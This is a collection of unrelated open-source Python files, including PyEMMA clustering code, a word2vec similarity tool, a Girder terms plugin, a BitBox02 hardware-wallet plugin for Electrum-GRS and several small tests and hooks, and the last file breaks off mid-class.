def n_clusters(self, val):
self.max_centers = val
def _estimate(self, iterable, **kwargs):
########
# Calculate clustercenters:
# 1. choose first datapoint as centroid
# 2. for all X: calc distances to all clustercenters
# 3. add new centroid, if min(distance to all other clustercenters) >= dmin
########
# temporary list to store cluster centers
clustercenters = []
used_frames = 0
from ._ext import regspace
self._inst = regspace.Regspace_f(self.dmin, self.max_centers, self.metric, iterable.ndim)
it = iterable.iterator(return_trajindex=False, stride=self.stride,
chunk=self.chunksize, skip=self.skip)
try:
with it:
for X in it:
used_frames += len(X)
self._inst.cluster(X.astype(np.float32, order='C', copy=False),
clustercenters, self.n_jobs)
self._converged = True
except regspace.MaxCentersReachedException:
self._converged = False
msg = 'Maximum number of cluster centers reached.' \
' Consider increasing max_centers or choose' \
' a larger minimum distance, dmin.'
self.logger.warning(msg)
warnings.warn(msg)
# pass amount of processed data
used_data = used_frames / float(it.n_frames_total()) * 100.0
raise NotConvergedWarning("Used data for centers: %.2f%%" % used_data)
finally:
# even if not converged, we store the found centers.
new_shape = (len(clustercenters), iterable.ndim)
clustercenters = np.array(clustercenters).reshape(new_shape)
self.update_model_params(clustercenters=clustercenters,
n_clusters=len(clustercenters))
if len(clustercenters) == 1:
self.logger.warning('Have found only one center according to '
'minimum distance requirement of %f' % self.dmin)
return self
|
fabian-paul/PyEMMA
|
pyemma/coordinates/clustering/regspace.py
|
Python
|
lgpl-3.0
| 6,283 | 0.002547 |
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 12 11:57:45 2016
@author: katerinailiakopoulou
"""
import gensim
import logging
import sys
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
"""
The Finder finds which words are similar to the one given
based on the word2vec word vectors. It also prints how similar two
words are depending on their word vectors comparison.
"""
class Finder(object):
def __init__(self,model,output,topn):
self.output_file = open(output,'w')
self.m = gensim.models.Word2Vec.load(model)
print(len(self.m.index2word))
self.n = topn
def get_most_similar(self,input):
self.output_file.write('---Similar words to:' + input + '---\n')
try:
self.output_file.write(str(self.m.most_similar([input], topn=self.n)))
except KeyError as e:
self.output_file.write(str(e))
self.output_file.write('\n')
def get_pos_negs_similar(self,input):
self.output_file.write('--- Similar words to: ' + input + '---\n')
pos_negs = input.split('NOT')
pos = pos_negs[0]
neg = pos_negs[1]
poss = pos.split('AND')
negs = neg.split(',')
positives = []
for p in poss:
positives.append(p.strip())
negatives = []
for n in negs:
negatives.append(n.strip())
try:
self.output_file.write(str(self.m.most_similar(positive=positives, negative=negatives, topn=self.n)))
except KeyError as e:
self.output_file.write(str(e))
self.output_file.write('\n')
def get_pos_similar(self,input):
self.output_file.write('--- Similar words to: ' + input + '---\n')
poss = input.split('AND')
positives = []
for p in poss:
positives.append(p.strip())
try:
self.output_file.write(str(self.m.most_similar(positive=positives, topn=self.n)))
except KeyError as e:
self.output_file.write(str(e))
self.output_file.write('\n')
def get_similarity(self,input):
self.output_file.write('--- Similarity between: ' + input + '---\n')
parts = input.split('-')
try:
self.output_file.write(str(self.m.similarity(parts[0], parts[1])))
except KeyError as e:
self.output_file.write(str(e))
self.output_file.write('\n')
def process_input(self,input):
f = open(input, 'r+')
for line in f:
word = line.replace("\n", "")
if 'AND' and 'NOT' in line:
self.get_pos_negs_similar(word)
elif 'AND' in line:
self.get_pos_similar(word)
elif '-' in line:
self.get_similarity(word)
else:
self.get_most_similar(word)
if __name__ == "__main__":
if len(sys.argv) < 5:
sys.exit('Please provide [word2vec model] [input directory], [output directory] [similar word count]: [--s --s --s --int]')
Finder(sys.argv[1],sys.argv[3],int(sys.argv[4])).process_input(sys.argv[2])
|
matzika/article-tagger-system
|
words_similarity_detector.py
|
Python
|
gpl-2.0
| 3,189 | 0.007839 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import datetime
import hashlib
from girder import events
from girder.api import access
from girder.api.describe import Description, autoDescribeRoute
from girder.api.rest import boundHandler, RestException
from girder.api.v1.collection import Collection
from girder.constants import AccessType, TokenScope
from girder.models.model_base import ModelImporter
@access.user(scope=TokenScope.DATA_READ)
@boundHandler
@autoDescribeRoute(
Description('Accept a collection\'s Terms of Use for the current user.')
.modelParam('id', model='collection', level=AccessType.READ)
.param('termsHash', 'The SHA-256 hash of this collection\'s terms, encoded in hexadecimal.')
)
def acceptCollectionTerms(self, collection, termsHash):
if not collection.get('terms'):
raise RestException('This collection currently has no terms.')
# termsHash should be encoded to a bytes object, but storing bytes into MongoDB behaves
# differently in Python 2 vs 3. Additionally, serializing a bytes to JSON behaves differently
# in Python 2 vs 3. So, just keep it as a unicode (or ordinary Python 2 str).
realTermsHash = hashlib.sha256(collection['terms'].encode('utf-8')).hexdigest()
if termsHash != realTermsHash:
# This "proves" that the client has at least accessed the terms
raise RestException(
'The submitted "termsHash" does not correspond to the collection\'s current terms.')
ModelImporter.model('user').update(
{'_id': self.getCurrentUser()['_id']},
{'$set': {
'terms.collection.%s' % collection['_id']: {
'hash': termsHash,
'accepted': datetime.datetime.now()
}
}}
)
def afterPostPutCollection(event):
# This will only trigger if no exceptions (for access, invalid id, etc.) are thrown
extraParams = event.info['params']
if 'terms' in extraParams:
collectionResponse = event.info['returnVal']
collectionId = collectionResponse['_id']
terms = extraParams['terms']
ModelImporter.model('collection').update(
{'_id': collectionId},
{'$set': {'terms': terms}}
)
collectionResponse['terms'] = terms
event.addResponse(collectionResponse)
def load(info):
# Augment the collection creation and edit routes to accept a terms field
events.bind('rest.post.collection.after', 'terms', afterPostPutCollection)
events.bind('rest.put.collection/:id.after', 'terms', afterPostPutCollection)
for handler in [
Collection.createCollection,
Collection.updateCollection
]:
handler.description.param('terms', 'The Terms of Use for the collection.', required=False)
# Expose the terms field on all collections
ModelImporter.model('collection').exposeFields(level=AccessType.READ, fields={'terms'})
# Add endpoint for registered users to accept terms
info['apiRoot'].collection.route('POST', (':id', 'acceptTerms'), acceptCollectionTerms)
# Expose the terms field on all users
ModelImporter.model('user').exposeFields(level=AccessType.ADMIN, fields={'terms'})
|
adsorensen/girder
|
plugins/terms/server/__init__.py
|
Python
|
apache-2.0
| 3,937 | 0.003048 |
# -*- coding: utf-8 -*-
from pyload.plugin.Crypter import Crypter
class Dereferer(SimpleDereferer):
__name = "Dereferer"
__type = "crypter"
__version = "0.11"
__pattern = r'https?://([^/]+)/.*?(?P<LINK>(ht|f)tps?(://|%3A%2F%2F).+)'
__config = [("use_subfolder" , "bool", "Save package to subfolder" , True),
("subfolder_per_pack", "bool", "Create a subfolder for each package", True)]
__description = """Crypter for dereferers"""
__license = "GPLv3"
__authors = [("zoidberg", "zoidberg@mujmail.cz")]
|
ardi69/pyload-0.4.10
|
pyload/plugin/crypter/Dereferer.py
|
Python
|
gpl-3.0
| 584 | 0.017123 |
#!/usr/bin/env vpython
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import subprocess
import sys
import unittest
import mock
import merge_lib as merger
class MergeLibTest(unittest.TestCase):
# pylint: disable=super-with-arguments
def __init__(self, *args, **kwargs):
super(MergeLibTest, self).__init__(*args, **kwargs)
self.maxDiff = None
# pylint: enable=super-with-arguments
@mock.patch.object(subprocess, 'check_output')
def test_validate_and_convert_profraw(self, mock_cmd):
test_cases = [
([''], [['mock.profdata'], [], []]),
(['Counter overflow'], [[], ['mock.profraw'], ['mock.profraw']]),
(subprocess.CalledProcessError(
255,
'llvm-cov merge -o mock.profdata -sparse=true mock.profraw',
output='Malformed profile'), [[], ['mock.profraw'], []]),
]
for side_effect, expected_results in test_cases:
mock_cmd.side_effect = side_effect
output_profdata_files = []
invalid_profraw_files = []
counter_overflows = []
merger._validate_and_convert_profraw(
'mock.profraw', output_profdata_files, invalid_profraw_files,
counter_overflows, '/usr/bin/llvm-cov')
self.assertEqual(
expected_results,
[output_profdata_files, invalid_profraw_files, counter_overflows])
if __name__ == '__main__':
unittest.main()
|
chromium/chromium
|
testing/merge_scripts/code_coverage/merge_lib_test.py
|
Python
|
bsd-3-clause
| 1,506 | 0.007968 |
#
# BitBox02 Electrum plugin code.
#
import hid
from typing import TYPE_CHECKING, Dict, Tuple, Optional, List, Any, Callable
from electrum_grs import bip32, constants
from electrum_grs.i18n import _
from electrum_grs.keystore import Hardware_KeyStore
from electrum_grs.transaction import PartialTransaction
from electrum_grs.wallet import Standard_Wallet, Multisig_Wallet, Deterministic_Wallet
from electrum_grs.util import bh2u, UserFacingException
from electrum_grs.base_wizard import ScriptTypeNotSupported, BaseWizard
from electrum_grs.logging import get_logger
from electrum_grs.plugin import Device, DeviceInfo, runs_in_hwd_thread
from electrum_grs.simple_config import SimpleConfig
from electrum_grs.json_db import StoredDict
from electrum_grs.storage import get_derivation_used_for_hw_device_encryption
from electrum_grs.bitcoin import OnchainOutputType
import electrum_grs.bitcoin as bitcoin
import electrum_grs.ecc as ecc
from ..hw_wallet import HW_PluginBase, HardwareClientBase
_logger = get_logger(__name__)
try:
from bitbox02 import bitbox02
from bitbox02 import util
from bitbox02.communication import (
devices,
HARDENED,
u2fhid,
bitbox_api_protocol,
FirmwareVersionOutdatedException,
)
requirements_ok = True
except ImportError as e:
if not (isinstance(e, ModuleNotFoundError) and e.name == 'bitbox02'):
_logger.exception('error importing bitbox02 plugin deps')
requirements_ok = False
class BitBox02Client(HardwareClientBase):
# handler is a BitBox02_Handler, importing it would lead to a circular dependency
def __init__(self, handler: Any, device: Device, config: SimpleConfig, *, plugin: HW_PluginBase):
HardwareClientBase.__init__(self, plugin=plugin)
self.bitbox02_device = None # type: Optional[bitbox02.BitBox02]
self.handler = handler
self.device_descriptor = device
self.config = config
self.bitbox_hid_info = None
if self.config.get("bitbox02") is None:
bitbox02_config: dict = {
"remote_static_noise_keys": [],
"noise_privkey": None,
}
self.config.set_key("bitbox02", bitbox02_config)
bitboxes = devices.get_any_bitbox02s()
for bitbox in bitboxes:
if (
bitbox["path"] == self.device_descriptor.path
and bitbox["interface_number"]
== self.device_descriptor.interface_number
):
self.bitbox_hid_info = bitbox
if self.bitbox_hid_info is None:
raise Exception("No BitBox02 detected")
def is_initialized(self) -> bool:
return True
@runs_in_hwd_thread
def close(self):
try:
self.bitbox02_device.close()
except:
pass
def has_usable_connection_with_device(self) -> bool:
if self.bitbox_hid_info is None:
return False
return True
@runs_in_hwd_thread
def get_soft_device_id(self) -> Optional[str]:
if self.handler is None:
# Can't do the pairing without the handler. This happens at wallet creation time, when
# listing the devices.
return None
if self.bitbox02_device is None:
self.pairing_dialog()
return self.bitbox02_device.root_fingerprint().hex()
@runs_in_hwd_thread
def pairing_dialog(self):
def pairing_step(code: str, device_response: Callable[[], bool]) -> bool:
msg = "Please compare and confirm the pairing code on your BitBox02:\n" + code
self.handler.show_message(msg)
try:
res = device_response()
except:
# Close the hid device on exception
hid_device.close()
raise
finally:
self.handler.finished()
return res
def exists_remote_static_pubkey(pubkey: bytes) -> bool:
bitbox02_config = self.config.get("bitbox02")
noise_keys = bitbox02_config.get("remote_static_noise_keys")
if noise_keys is not None:
if pubkey.hex() in [noise_key for noise_key in noise_keys]:
return True
return False
def set_remote_static_pubkey(pubkey: bytes) -> None:
if not exists_remote_static_pubkey(pubkey):
bitbox02_config = self.config.get("bitbox02")
if bitbox02_config.get("remote_static_noise_keys") is not None:
bitbox02_config["remote_static_noise_keys"].append(pubkey.hex())
else:
bitbox02_config["remote_static_noise_keys"] = [pubkey.hex()]
self.config.set_key("bitbox02", bitbox02_config)
def get_noise_privkey() -> Optional[bytes]:
bitbox02_config = self.config.get("bitbox02")
privkey = bitbox02_config.get("noise_privkey")
if privkey is not None:
return bytes.fromhex(privkey)
return None
def set_noise_privkey(privkey: bytes) -> None:
bitbox02_config = self.config.get("bitbox02")
bitbox02_config["noise_privkey"] = privkey.hex()
self.config.set_key("bitbox02", bitbox02_config)
def attestation_warning() -> None:
self.handler.show_error(
"The BitBox02 attestation failed.\nTry reconnecting the BitBox02.\nWarning: The device might not be genuine, if the\n problem persists please contact Shift support.",
blocking=True
)
class NoiseConfig(bitbox_api_protocol.BitBoxNoiseConfig):
"""NoiseConfig extends BitBoxNoiseConfig"""
def show_pairing(self, code: str, device_response: Callable[[], bool]) -> bool:
return pairing_step(code, device_response)
def attestation_check(self, result: bool) -> None:
if not result:
attestation_warning()
def contains_device_static_pubkey(self, pubkey: bytes) -> bool:
return exists_remote_static_pubkey(pubkey)
def add_device_static_pubkey(self, pubkey: bytes) -> None:
return set_remote_static_pubkey(pubkey)
def get_app_static_privkey(self) -> Optional[bytes]:
return get_noise_privkey()
def set_app_static_privkey(self, privkey: bytes) -> None:
return set_noise_privkey(privkey)
if self.bitbox02_device is None:
hid_device = hid.device()
hid_device.open_path(self.bitbox_hid_info["path"])
bitbox02_device = bitbox02.BitBox02(
transport=u2fhid.U2FHid(hid_device),
device_info=self.bitbox_hid_info,
noise_config=NoiseConfig(),
)
try:
bitbox02_device.check_min_version()
except FirmwareVersionOutdatedException:
raise
self.bitbox02_device = bitbox02_device
self.fail_if_not_initialized()
def fail_if_not_initialized(self) -> None:
assert self.bitbox02_device
if not self.bitbox02_device.device_info()["initialized"]:
raise Exception(
"Please initialize the BitBox02 using the BitBox app first before using the BitBox02 in electrum"
)
def coin_network_from_electrum_network(self) -> int:
if constants.net.TESTNET:
return bitbox02.btc.TBTC
return bitbox02.btc.BTC
@runs_in_hwd_thread
def get_password_for_storage_encryption(self) -> str:
derivation = get_derivation_used_for_hw_device_encryption()
derivation_list = bip32.convert_bip32_path_to_list_of_uint32(derivation)
xpub = self.bitbox02_device.electrum_encryption_key(derivation_list)
node = bip32.BIP32Node.from_xkey(xpub, net = constants.BitcoinMainnet()).subkey_at_public_derivation(())
return node.eckey.get_public_key_bytes(compressed=True).hex()
@runs_in_hwd_thread
def get_xpub(self, bip32_path: str, xtype: str, *, display: bool = False) -> str:
if self.bitbox02_device is None:
self.pairing_dialog()
if self.bitbox02_device is None:
raise Exception(
"Need to setup communication first before attempting any BitBox02 calls"
)
self.fail_if_not_initialized()
xpub_keypath = bip32.convert_bip32_path_to_list_of_uint32(bip32_path)
coin_network = self.coin_network_from_electrum_network()
if xtype == "p2wpkh":
if coin_network == bitbox02.btc.BTC:
out_type = bitbox02.btc.BTCPubRequest.ZPUB
else:
out_type = bitbox02.btc.BTCPubRequest.VPUB
elif xtype == "p2wpkh-p2sh":
if coin_network == bitbox02.btc.BTC:
out_type = bitbox02.btc.BTCPubRequest.YPUB
else:
out_type = bitbox02.btc.BTCPubRequest.UPUB
elif xtype == "p2wsh-p2sh":
if coin_network == bitbox02.btc.BTC:
out_type = bitbox02.btc.BTCPubRequest.CAPITAL_YPUB
else:
out_type = bitbox02.btc.BTCPubRequest.CAPITAL_UPUB
elif xtype == "p2wsh":
if coin_network == bitbox02.btc.BTC:
out_type = bitbox02.btc.BTCPubRequest.CAPITAL_ZPUB
else:
out_type = bitbox02.btc.BTCPubRequest.CAPITAL_VPUB
# The other legacy types are not supported
else:
raise Exception("invalid xtype:{}".format(xtype))
return self.bitbox02_device.btc_xpub(
keypath=xpub_keypath,
xpub_type=out_type,
coin=coin_network,
display=display,
)
@runs_in_hwd_thread
def label(self) -> str:
if self.handler is None:
# Can't do the pairing without the handler. This happens at wallet creation time, when
# listing the devices.
return super().label()
if self.bitbox02_device is None:
self.pairing_dialog()
# We add the fingerprint to the label, as if there are two devices with the same label, the
# device manager can mistake one for another and fail.
return "%s (%s)" % (
self.bitbox02_device.device_info()["name"],
self.bitbox02_device.root_fingerprint().hex(),
)
@runs_in_hwd_thread
def request_root_fingerprint_from_device(self) -> str:
if self.bitbox02_device is None:
raise Exception(
"Need to setup communication first before attempting any BitBox02 calls"
)
return self.bitbox02_device.root_fingerprint().hex()
def is_pairable(self) -> bool:
if self.bitbox_hid_info is None:
return False
return True
@runs_in_hwd_thread
def btc_multisig_config(
self, coin, bip32_path: List[int], wallet: Multisig_Wallet, xtype: str,
):
"""
Set and get a multisig config with the current device and some other arbitrary xpubs.
Registers it on the device if not already registered.
xtype: 'p2wsh' | 'p2wsh-p2sh'
"""
assert xtype in ("p2wsh", "p2wsh-p2sh")
if self.bitbox02_device is None:
raise Exception(
"Need to setup communication first before attempting any BitBox02 calls"
)
account_keypath = bip32_path[:-2]
xpubs = wallet.get_master_public_keys()
our_xpub = self.get_xpub(
bip32.convert_bip32_intpath_to_strpath(account_keypath), xtype
)
multisig_config = bitbox02.btc.BTCScriptConfig(
multisig=bitbox02.btc.BTCScriptConfig.Multisig(
threshold=wallet.m,
xpubs=[util.parse_xpub(xpub) for xpub in xpubs],
our_xpub_index=xpubs.index(our_xpub),
script_type={
"p2wsh": bitbox02.btc.BTCScriptConfig.Multisig.P2WSH,
"p2wsh-p2sh": bitbox02.btc.BTCScriptConfig.Multisig.P2WSH_P2SH,
}[xtype]
)
)
is_registered = self.bitbox02_device.btc_is_script_config_registered(
coin, multisig_config, account_keypath
)
if not is_registered:
name = self.handler.name_multisig_account()
try:
self.bitbox02_device.btc_register_script_config(
coin=coin,
script_config=multisig_config,
keypath=account_keypath,
name=name,
)
except bitbox02.DuplicateEntryException:
raise
except:
raise UserFacingException("Failed to register multisig\naccount configuration on BitBox02")
return multisig_config
@runs_in_hwd_thread
def show_address(
self, bip32_path: str, address_type: str, wallet: Deterministic_Wallet
) -> str:
if self.bitbox02_device is None:
raise Exception(
"Need to setup communication first before attempting any BitBox02 calls"
)
address_keypath = bip32.convert_bip32_path_to_list_of_uint32(bip32_path)
coin_network = self.coin_network_from_electrum_network()
if address_type == "p2wpkh":
script_config = bitbox02.btc.BTCScriptConfig(
simple_type=bitbox02.btc.BTCScriptConfig.P2WPKH
)
elif address_type == "p2wpkh-p2sh":
script_config = bitbox02.btc.BTCScriptConfig(
simple_type=bitbox02.btc.BTCScriptConfig.P2WPKH_P2SH
)
elif address_type in ("p2wsh-p2sh", "p2wsh"):
if type(wallet) is Multisig_Wallet:
script_config = self.btc_multisig_config(
coin_network, address_keypath, wallet, address_type,
)
else:
raise Exception("Can only use p2wsh-p2sh or p2wsh with multisig wallets")
else:
raise Exception(
"invalid address xtype: {} is not supported by the BitBox02".format(
address_type
)
)
return self.bitbox02_device.btc_address(
keypath=address_keypath,
coin=coin_network,
script_config=script_config,
display=True,
)
def _get_coin(self):
return bitbox02.btc.TBTC if constants.net.TESTNET else bitbox02.btc.BTC
@runs_in_hwd_thread
def sign_transaction(
self,
keystore: Hardware_KeyStore,
tx: PartialTransaction,
wallet: Deterministic_Wallet,
):
if tx.is_complete():
return
if self.bitbox02_device is None:
raise Exception(
"Need to setup communication first before attempting any BitBox02 calls"
)
coin = self._get_coin()
tx_script_type = None
# Build BTCInputType list
inputs = []
for txin in tx.inputs():
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path is None:
raise Exception(
"A wallet owned pubkey was not found in the transaction input to be signed"
)
prev_tx = txin.utxo
if prev_tx is None:
raise UserFacingException(_('Missing previous tx.'))
prev_inputs: List[bitbox02.BTCPrevTxInputType] = []
prev_outputs: List[bitbox02.BTCPrevTxOutputType] = []
for prev_txin in prev_tx.inputs():
prev_inputs.append(
{
"prev_out_hash": prev_txin.prevout.txid[::-1],
"prev_out_index": prev_txin.prevout.out_idx,
"signature_script": prev_txin.script_sig,
"sequence": prev_txin.nsequence,
}
)
for prev_txout in prev_tx.outputs():
prev_outputs.append(
{
"value": prev_txout.value,
"pubkey_script": prev_txout.scriptpubkey,
}
)
inputs.append(
{
"prev_out_hash": txin.prevout.txid[::-1],
"prev_out_index": txin.prevout.out_idx,
"prev_out_value": txin.value_sats(),
"sequence": txin.nsequence,
"keypath": full_path,
"script_config_index": 0,
"prev_tx": {
"version": prev_tx.version,
"locktime": prev_tx.locktime,
"inputs": prev_inputs,
"outputs": prev_outputs,
},
}
)
if tx_script_type == None:
tx_script_type = txin.script_type
elif tx_script_type != txin.script_type:
raise Exception("Cannot mix different input script types")
if tx_script_type == "p2wpkh":
tx_script_type = bitbox02.btc.BTCScriptConfig(
simple_type=bitbox02.btc.BTCScriptConfig.P2WPKH
)
elif tx_script_type == "p2wpkh-p2sh":
tx_script_type = bitbox02.btc.BTCScriptConfig(
simple_type=bitbox02.btc.BTCScriptConfig.P2WPKH_P2SH
)
elif tx_script_type in ("p2wsh-p2sh", "p2wsh"):
if type(wallet) is Multisig_Wallet:
tx_script_type = self.btc_multisig_config(coin, full_path, wallet, tx_script_type)
else:
raise Exception("Can only use p2wsh-p2sh or p2wsh with multisig wallets")
else:
raise UserFacingException(
"invalid input script type: {} is not supported by the BitBox02".format(
tx_script_type
)
)
# Build BTCOutputType list
outputs = []
for txout in tx.outputs():
assert txout.address
# check for change
if txout.is_change:
my_pubkey, change_pubkey_path = keystore.find_my_pubkey_in_txinout(txout)
outputs.append(
bitbox02.BTCOutputInternal(
keypath=change_pubkey_path, value=txout.value, script_config_index=0,
)
)
else:
addrtype, pubkey_hash = bitcoin.address_to_hash(txout.address)
if addrtype == OnchainOutputType.P2PKH:
output_type = bitbox02.btc.P2PKH
elif addrtype == OnchainOutputType.P2SH:
output_type = bitbox02.btc.P2SH
elif addrtype == OnchainOutputType.WITVER0_P2WPKH:
output_type = bitbox02.btc.P2WPKH
elif addrtype == OnchainOutputType.WITVER0_P2WSH:
output_type = bitbox02.btc.P2WSH
else:
raise UserFacingException(
"Received unsupported output type during transaction signing: {} is not supported by the BitBox02".format(
addrtype
)
)
outputs.append(
bitbox02.BTCOutputExternal(
output_type=output_type,
output_hash=pubkey_hash,
value=txout.value,
)
)
keypath_account = full_path[:-2]
sigs = self.bitbox02_device.btc_sign(
coin,
[bitbox02.btc.BTCScriptConfigWithKeypath(
script_config=tx_script_type,
keypath=keypath_account,
)],
inputs=inputs,
outputs=outputs,
locktime=tx.locktime,
version=tx.version,
)
# Fill signatures
if len(sigs) != len(tx.inputs()):
raise Exception("Incorrect number of inputs signed.") # Should never occur
signatures = [bh2u(ecc.der_sig_from_sig_string(x[1])) + "01" for x in sigs]
tx.update_signatures(signatures)
def sign_message(self, keypath: str, message: bytes, xtype: str) -> bytes:
if self.bitbox02_device is None:
raise Exception(
"Need to setup communication first before attempting any BitBox02 calls"
)
try:
simple_type = {
"p2wpkh-p2sh":bitbox02.btc.BTCScriptConfig.P2WPKH_P2SH,
"p2wpkh": bitbox02.btc.BTCScriptConfig.P2WPKH,
}[xtype]
except KeyError:
raise UserFacingException("The BitBox02 does not support signing messages for this address type: {}".format(xtype))
_, _, signature = self.bitbox02_device.btc_sign_msg(
self._get_coin(),
bitbox02.btc.BTCScriptConfigWithKeypath(
script_config=bitbox02.btc.BTCScriptConfig(
simple_type=simple_type,
),
keypath=bip32.convert_bip32_path_to_list_of_uint32(keypath),
),
message,
)
return signature
class BitBox02_KeyStore(Hardware_KeyStore):
hw_type = "bitbox02"
device = "BitBox02"
plugin: "BitBox02Plugin"
def __init__(self, d: dict):
super().__init__(d)
self.force_watching_only = False
self.ux_busy = False
def get_client(self):
return self.plugin.get_client(self)
def give_error(self, message: Exception, clear_client: bool = False):
self.logger.info(message)
if not self.ux_busy:
self.handler.show_error(message)
else:
self.ux_busy = False
if clear_client:
self.client = None
raise UserFacingException(message)
def decrypt_message(self, pubkey, message, password):
raise UserFacingException(
_(
"Message encryption, decryption and signing are currently not supported for {}"
).format(self.device)
)
def sign_message(self, sequence, message, password):
if password:
raise Exception("BitBox02 does not accept a password from the host")
client = self.get_client()
keypath = self.get_derivation_prefix() + "/%d/%d" % sequence
xtype = self.get_bip32_node_for_xpub().xtype
return client.sign_message(keypath, message.encode("utf-8"), xtype)
@runs_in_hwd_thread
def sign_transaction(self, tx: PartialTransaction, password: str):
if tx.is_complete():
return
client = self.get_client()
assert isinstance(client, BitBox02Client)
try:
try:
self.handler.show_message("Authorize Transaction...")
client.sign_transaction(self, tx, self.handler.get_wallet())
finally:
self.handler.finished()
except Exception as e:
self.logger.exception("")
self.give_error(e, True)
return
@runs_in_hwd_thread
def show_address(
self, sequence: Tuple[int, int], txin_type: str, wallet: Deterministic_Wallet
):
client = self.get_client()
address_path = "{}/{}/{}".format(
self.get_derivation_prefix(), sequence[0], sequence[1]
)
try:
try:
self.handler.show_message(_("Showing address ..."))
dev_addr = client.show_address(address_path, txin_type, wallet)
finally:
self.handler.finished()
except Exception as e:
self.logger.exception("")
self.handler.show_error(e)
class BitBox02Plugin(HW_PluginBase):
keystore_class = BitBox02_KeyStore
minimum_library = (5, 2, 0)
DEVICE_IDS = [(0x03EB, 0x2403)]
SUPPORTED_XTYPES = ("p2wpkh-p2sh", "p2wpkh", "p2wsh", "p2wsh-p2sh")
def __init__(self, parent: HW_PluginBase, config: SimpleConfig, name: str):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_devices(self.DEVICE_IDS, plugin=self)
def get_library_version(self):
try:
from bitbox02 import bitbox02
version = bitbox02.__version__
except:
version = "unknown"
if requirements_ok:
return version
else:
raise ImportError()
# handler is a BitBox02_Handler
@runs_in_hwd_thread
def create_client(self, device: Device, handler: Any) -> BitBox02Client:
if not handler:
self.handler = handler
return BitBox02Client(handler, device, self.config, plugin=self)
def setup_device(
self, device_info: DeviceInfo, wizard: BaseWizard, purpose: int
):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
assert isinstance(client, BitBox02Client)
if client.bitbox02_device is None:
wizard.run_task_without_blocking_gui(
task=lambda client=client: client.pairing_dialog())
client.fail_if_not_initialized()
return client
def get_xpub(
self, device_id: str, derivation: str, xtype: str, wizard: BaseWizard
):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(
_("This type of script is not supported with {}: {}").format(self.device, xtype)
)
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
assert isinstance(client, BitBox02Client)
assert client.bitbox02_device is not None
return client.get_xpub(derivation, xtype)
@runs_in_hwd_thread
def show_address(
self,
wallet: Deterministic_Wallet,
address: str,
keystore: BitBox02_KeyStore = None,
):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
txin_type = wallet.get_txin_type(address)
sequence = wallet.get_address_index(address)
keystore.show_address(sequence, txin_type, wallet)
@runs_in_hwd_thread
def show_xpub(self, keystore: BitBox02_KeyStore):
client = keystore.get_client()
assert isinstance(client, BitBox02Client)
derivation = keystore.get_derivation_prefix()
xtype = keystore.get_bip32_node_for_xpub().xtype
client.get_xpub(derivation, xtype, display=True)
def create_device_from_hid_enumeration(self, d: dict, *, product_key) -> 'Device':
device = super().create_device_from_hid_enumeration(d, product_key=product_key)
# The BitBox02's product_id is not unique per device, thus use the path instead to
# distinguish devices.
id_ = str(d['path'])
return device._replace(id_=id_)
|
GroestlCoin/electrum-grs
|
electrum_grs/plugins/bitbox02/bitbox02.py
|
Python
|
gpl-3.0
| 27,314 | 0.002123 |
#-----------------------------------------------------------------------------
# Copyright (c) 2005-2020, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
"""
Import hook for PyGObject's "gi.repository.Champlain" package.
"""
from PyInstaller.utils.hooks import get_gi_typelibs
binaries, datas, hiddenimports = get_gi_typelibs('Champlain', '0.12')
|
etherkit/OpenBeacon2
|
macos/venv/lib/python3.8/site-packages/PyInstaller/hooks/hook-gi.repository.Champlain.py
|
Python
|
gpl-3.0
| 702 | 0.002849 |
# -*- coding: utf-8 -*-
"""
@author: kevinhikali
@email: hmingwei@gmail.com
"""
import tensorflow as tf
A = [[1, 2, 3, 4]]
B = [[2, 2, 3, 4]]
casted = tf.cast(tf.equal(A, B), dtype='float32')
with tf.Session() as sess:
print(sess.run(casted))
|
kevinhikali/ml_kevin
|
tf/tf_cast.py
|
Python
|
gpl-3.0
| 250 | 0 |
from unittest2 import TestCase, skip
from bsPlugins.Annotate import AnnotatePlugin
import os
path = 'testing_files/'
class Test_AnnotatePlugin(TestCase):
def setUp(self):
self.plugin = AnnotatePlugin()
def test_with_signals(self):
self.plugin(**{'track':path+'KO50.bedGraph', 'assembly':'mm9',
'promoter':0, 'intergenic':0, 'UTR':0})
with open(self.plugin.output_files[0][0],'rb') as f:
content = f.readlines()
self.assertEqual(len(content),50)
def tearDown(self):
for f in os.listdir('.'):
if f.startswith('tmp'):
os.system("rm -rf %s" % f)
# nosetests --logging-filter=-tw2 test_Annotate.py
|
bbcf/bsPlugins
|
tests/test_Annotate.py
|
Python
|
gpl-3.0
| 717 | 0.011158 |
# -*- coding: utf-8 -*-
import random
import re
import time
import urlparse, urllib,urllib2,cookielib
from base64 import b64encode
import xbmc
import xbmcgui,xbmcaddon,os
__scriptID__ = 'plugin.video.live.magellan'
__addon__ = xbmcaddon.Addon(__scriptID__)
class cInputWindow(xbmcgui.WindowDialog):
def __init__(self, *args, **kwargs):
bg_image = os.path.join( __addon__.getAddonInfo('path'), 'Images/' ) + "background.png"
check_image = os.path.join( __addon__.getAddonInfo('path'), 'Images/' ) + "trans_checked.png"
uncheck_image = os.path.join( __addon__.getAddonInfo('path'), 'Images/' ) + "trans_unchecked1.png"
